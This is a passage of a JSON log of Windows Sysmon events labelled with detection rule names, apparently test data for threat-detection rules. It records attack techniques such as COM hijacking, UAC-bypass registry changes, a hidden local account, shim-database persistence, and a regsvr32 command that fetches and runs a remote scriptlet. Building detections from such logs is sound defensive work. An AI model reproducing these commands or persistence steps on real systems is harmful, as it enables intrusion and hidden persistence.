22:22:31.925"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7536,"Execution_attributes":{"ProcessID":1960,"ThreadID":1916},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:22:31.957120Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Logon Scripts (UserInitMprLogonScript)","Suspicious Userinit Child Process"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\"","Company":"","CurrentDirectory":"C:\\Windows\\system32\\","Description":"NpmTaskRunner","FileVersion":"1.0.0.0","Hashes":"SHA1=E2286C233467D0E164ED5ED1D07BAC9F90F74D19,MD5=41CE32C0D1D4E5BB8C63674F317450EF,SHA256=5DE788D23B247B29F116CD0583280CE10A429E9F8C1D80C42DEAB20C6F4DBB4E,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1E4A-5D04-0000-002013C00B00","LogonId":"0xbc013","ParentCommandLine":"C:\\Windows\\system32\\userinit.exe","ParentImage":"C:\\Windows\\System32\\userinit.exe","ParentProcessGuid":"365ABB72-1E51-5D04-0000-00104C340C00","ParentProcessId":3448,"ProcessGuid":"365ABB72-1E51-5D04-0000-00107B380C00","ProcessId":3444,"Product":"NpmTaskRunner","RuleName":"","TerminalSessionId":2,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-14 
22:23:13.925"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7556,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:23:13.957120Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"365ABB72-1E54-5D04-0000-0010B7B30C00","ProcessId":1724,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-06-14 22:23:26.811"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7563,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:23:26.811612Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry 
Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\regedit.exe","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-8DEC-5F00-0000-0010F0460800","ProcessId":5128,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.reg\\OpenWithList\\b","UtcTime":"2020-07-04 14:31:23.825"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306383,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:23.903600Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Count","UtcTime":"2020-07-04 
14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306384,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:26.838832Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DefaultInstall","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Section1","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306385,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:26.849140Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\programdata\\gpo.inf","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending 
GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Path1","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306386,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:26.856657Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Details":"\"c:\\windows\\tasks\\taskhost.exe\"","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\evasion\\a.exe","ProcessGuid":"747F3D96-8FD2-5F00-0000-0010C15D2200","ProcessId":3728,"RuleName":"Persistence - Hidden Run value detected","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\","UtcTime":"2020-07-04 14:18:58.231"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306346,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:18:58.268712Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Registry Persistence COM Search Order Hijacking","OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\ProgramData\\demo.dll","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Downloads\\com-hijack.exe","ProcessGuid":"365ABB72-47BB-5CE3-0000-0010BFA83E00","ProcessId":1912,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\InprocServer32\\(Default)","UtcTime":"2019-05-21 00:35:07.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":372,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T00:35:07.474160Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-20 23:39:21.672","Image":"C:\\Users\\IEUser\\Downloads\\com-hijack.exe","ProcessGuid":"365ABB72-47BB-5CE3-0000-0010BFA83E00","ProcessId":1912,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\test.bat","UtcTime":"2019-05-21 
00:35:07.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":373,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-21T00:35:07.474160Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\User\\Documents\\mapid.tlb","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-4FED-5CE3-0000-001031174900","ProcessId":3808,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InProcServer32\\{Default}","UtcTime":"2019-05-21 01:10:05.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":445,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T01:10:05.290459Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"Apartment","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-5014-5CE3-0000-00105C444900","ProcessId":3860,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InProcServer32\\ThreadingModel","UtcTime":"2019-05-21 01:10:44.797"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":447,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T01:10:44.807281Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"{49CBB1C7-97D1-485A-9EC1-A26065633066}","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-501C-5CE3-0000-0010B5494900","ProcessId":2952,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\\TreatAs\\{Default}","UtcTime":"2019-05-21 
01:10:52.458"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":449,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T01:10:52.468297Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery","Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.3.9600.16384 (winblue_rtm.130821-1623)","Hashes":"SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"DFAE8213-832F-5CDD-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"C:\\Windows\\System32\\osk.exe\" ","ParentImage":"C:\\Windows\\System32\\osk.exe","ParentProcessGuid":"DFAE8213-8B02-5CDD-0000-00109BCA0A00","ParentProcessId":1720,"ProcessGuid":"DFAE8213-8B08-5CDD-0000-001011CE0A00","ProcessId":3764,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":2,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-16 
16:08:40.350"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1,"EventRecordID":18918,"Execution_attributes":{"ProcessID":1744,"ThreadID":2120},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-16T16:08:40.360593Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"747F3D96-68DD-5FDD-0000-00101B660000","ProcessId":648,"RuleName":"Hidden Local Account Created","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\hideme0007$\\(Default)","UtcTime":"2020-12-18 17:56:07.015"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":596571,"Execution_attributes":{"ProcessID":3552,"ThreadID":5004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-12-18T17:56:07.017817Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-B0EC-5CD9-0000-00201D340100","LogonId":"0x1341d","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-B0EC-5CD9-0000-0010D9D20000","ParentProcessId":944,"ProcessGuid":"365ABB72-B167-5CD9-0000-001062160C00","ProcessId":2476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-13 18:03:19.497"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17287,"Execution_attributes":{"ProcessID":276,"ThreadID":1000},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-13T18:03:19.681478Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"365ABB72-528D-5C91-0000-0010AD570000","ProcessId":500,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\ProductType","UtcTime":"2019-03-19 
20:35:25.831"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966215,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:41:11.979726Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55A1-5C91-0000-0010AB8C0700","ProcessId":2112,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:48:33.279"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966368,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:48:33.439582Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55A1-5C91-0000-0010D6960700","ProcessId":2368,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:48:33.639"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966382,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:48:33.870201Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55D7-5C91-0000-001067BD0700","ProcessId":2236,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:49:27.697"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966388,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:27.787731Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55D8-5C91-0000-001060C90700","ProcessId":3648,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:49:28.058"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966403,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:28.158264Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 